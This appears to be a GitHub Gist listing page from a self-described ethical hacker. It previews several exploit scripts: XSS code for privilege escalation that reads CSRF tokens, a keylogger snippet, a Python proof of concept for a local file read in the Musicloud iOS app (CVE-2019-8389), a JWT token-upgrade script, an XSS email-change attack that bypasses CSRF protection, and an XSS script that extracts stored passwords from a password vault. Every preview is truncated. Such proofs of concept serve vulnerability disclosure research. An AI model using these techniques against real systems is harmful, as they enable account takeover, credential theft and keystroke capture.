Shawar Khan shawarkhanethicalhacker

shawarkhanethicalhacker / XSS_Privilege_Escalation.js
Created Aug 4, 2019
Privilege escalation exploit code for XSS vulnerability that I have recently discovered.
View XSS_Privilege_Escalation.js
// XSS Exploit code for Privilege Escalation
// Author: Shawar Khan
var woot = document.createElement('html');
fetch('',{credentials: 'include'}).then((resp) => resp.text()).then(function(data){
  var csrf_token = woot.getElementsByTagName('meta')[3]['content'];
View exptest.js
var keys = '';
document.onkeypress = function(e) {
  var get = window.event ? event : e;
  var key = get.keyCode ? get.keyCode : get.charCode;
  key = String.fromCharCode(key);
  keys += key;
shawarkhanethicalhacker /
Last active Feb 17, 2019
[CVE-2019-8389] An exploit code for exploiting a local file read vulnerability in Musicloud v1.6 iOS Application
# Proof of concept for CVE-2019-8389
# Exploit author: Shawar Khan
import sys
import requests
def usage():
    print "Usage:\n\tpython /etc/passwd\n"
shawarkhanethicalhacker /
Last active Jan 28, 2019
A little automation for obtaining JWT token for a POC
# A sample code that obtains a permanent JWT token when provided a temporary JWT token
import json
import requests
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
jwt_token=raw_input("Enter token > ")
exploit_url = ""
exploit_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "", "authorization": "Bearer "+str(jwt_token), "content-type": "application/json", "origin": "", "Connection": "close"}
shawarkhanethicalhacker / email_change_exploit_xss.js
Created Sep 14, 2018
This is a sample exploit for exploiting an XSS vulnerability that changes the user email. This bypasses some CSRF protections as the page was revoking the CSRF protections when refreshed.
View email_change_exploit_xss.js
// a Simple XSS exploit for email change
// Shawar Khan
var dark_window ='');
function exploit_run(){
  dark_window.document.body.getElementsByTagName('form')[0][2].value='' // changes email
  dark_window.document.body.getElementsByTagName('form')[0][40].click() // clicks for submission
shawarkhanethicalhacker / password_vault_exploit.js
Created Aug 20, 2018
XSS Exploit code for retrieving passwords stored in a Password Vault
View password_vault_exploit.js
//Exploit Code by Shawar Khan
var data_chunks = '';
// Capturing Records from API
fetch('').then((resp) => resp.text()).then(function(data) {
  // Holds the records as a string
  var allrecords = data;
  // converting response to JSON